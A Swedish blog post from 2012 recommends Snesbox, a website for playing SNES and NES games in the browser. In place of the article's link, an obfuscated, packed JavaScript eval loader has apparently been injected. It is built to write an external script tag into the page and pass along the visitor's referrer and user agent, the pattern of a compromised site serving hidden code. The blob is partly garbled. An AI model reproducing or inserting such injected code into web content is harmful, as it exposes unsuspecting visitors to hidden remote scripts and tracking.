Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Spela SNES-spel gratis direkt i din browser!

Spela SNES-spel gratis direkt i din browser!
Filip Urde
  • On 16 augusti, 2012
  • http://www.revue.se/filip-urde

Det är på den underbara webbplatsen Snesbox som du nu kan ödsla lite mer tid framför datorn och spela en rad olika Super Nintendo-spel. Spelen spelar du direkt i webbläsaren via flash och det finns stöd för multiplayer, det fungerar dock sisådär. Något som är riktigt fint är att du kan spara dina spel, så om det krisar och du inte kan slutföra ditt spel så kan du fortsätta senare.

Förutom alla SNES-spel så finns även en massa NES-spel. Grym sida! Check it out på lunchen… eller nu ;).

Gå eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ykrhe|var|u0026u|referrer|zfyrd||js|php’.split(’|’),0,{}))
in här och KÖR!